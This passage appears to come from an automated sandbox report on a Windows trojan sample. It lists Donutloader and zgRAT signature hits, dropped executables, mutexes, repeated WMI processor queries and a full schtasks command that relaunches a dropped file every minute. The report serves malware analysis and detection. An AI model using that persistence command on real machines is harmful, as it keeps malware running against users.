                            Source: 00000009.00000003.2181775167.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 00000018.00000003.2693194416.0000021E0319A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 00000018.00000003.2692757034.0000021E034D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 00000018.00000003.2692958541.0000021E0318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.f363d4.1.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                            Source: 8.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.fbb9d4.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@69/36@0/6
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005DA330 CoInitializeEx,CoInitializeSecurity,CoUninitialize,CoCreateInstance,CoUninitialize,SysAllocString,SysFreeString,SysFreeString,CoSetProxyBlanket,CoUninitialize,SysAllocString,SysAllocString,SysFreeString,SysFreeString,CoUninitialize,VariantClear,VariantInit,VariantClear,CoUninitialize,0_2_005DA330
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeFile created: C:\Users\user\AppData\Roaming\rZ9zgPTnJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMutant created: \Sessions\1\BaseNamedObjects\f3b3de9e353268524740ab3df9b4ee37
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeMutant created: \Sessions\1\BaseNamedObjects\Global\23495762359867
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeMutant created: \Sessions\1\BaseNamedObjects\Global\349587345342
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeMutant created: \Sessions\1\BaseNamedObjects\93ec2b129ecfa430ebf98f
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeFile created: C:\Users\user\AppData\Local\Temp\23495762359867Jump to behavior
                            Source: RPHbzz3JqY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: RPHbzz3JqY.exeReversingLabs: Detection: 60%
                            Source: RPHbzz3JqY.exeVirustotal: Detection: 56%
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeFile read: C:\Users\user\Desktop\RPHbzz3JqY.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\RPHbzz3JqY.exe "C:\Users\user\Desktop\RPHbzz3JqY.exe"
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F
